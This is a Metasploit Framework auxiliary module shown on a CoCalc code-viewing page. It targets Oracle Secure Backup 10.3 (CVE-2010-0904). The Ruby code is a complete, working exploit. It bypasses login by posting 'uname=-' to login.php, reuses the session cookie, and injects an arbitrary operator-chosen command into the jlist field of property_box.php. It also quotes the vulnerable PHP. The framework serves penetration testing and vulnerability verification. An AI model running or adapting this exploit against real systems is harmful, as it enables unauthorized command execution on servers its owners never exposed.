CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',

12
      'Description'    => %q{

13
          This module exploits an authentication bypass vulnerability

14
        in login.php in order to execute arbitrary code via a command injection

15
        vulnerability in property_box.php. This module was tested

16
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2010-0904' ],

23
          [ 'OSVDB', '66338'],

24
          [ 'ZDI', '10-118' ],

25
        ],

26
      'DisclosureDate' => '2010-07-13'))

27


28
    register_options(

29
      [

30
        Opt::RPORT(443),

31
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),

32
        OptBool.new('SSL',   [true, 'Use SSL', true]),

33
      ])

34
  end

35


36
  def run

37
    cmd = datastore['CMD']

38


39
    res = send_request_cgi(

40
      {

41
        'uri'	=>  '/login.php',

42
        'data'	=>  'attempt=1&uname=-',

43
        'method' => 'POST',

44
      }, 5)

45


46
      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

47


48
          print_status("Sending command: #{datastore['CMD']}...")

49


50
          send_request_cgi(

51
            {

52
              'uri'	=> '/property_box.php',

53
              'data'  => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),

54
              'cookie' => res.get_cookies,

55
              'method' => 'POST',

56
            }, 5)

57


58
        print_status("Done.")

59
      else

60
        print_error("Invalid PHPSESSION token..")

61
        return

62
      end

63
  end

64
end

65
=begin

66
  else if (strcmp($type, "Job") == 0)

67
    {

68
    if (!is_array($objectname))

69
      $objectname = array();

70
    reset($objectname);

71
    while (list(,$oname) = each($objectname))

72
      {

73
      $oname = escapeshellarg($oname);

74
      $jlist = "$jlist $oname";

75
      }

76
    if (strlen($jlist) > 0)

77
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");

78
=end

79


80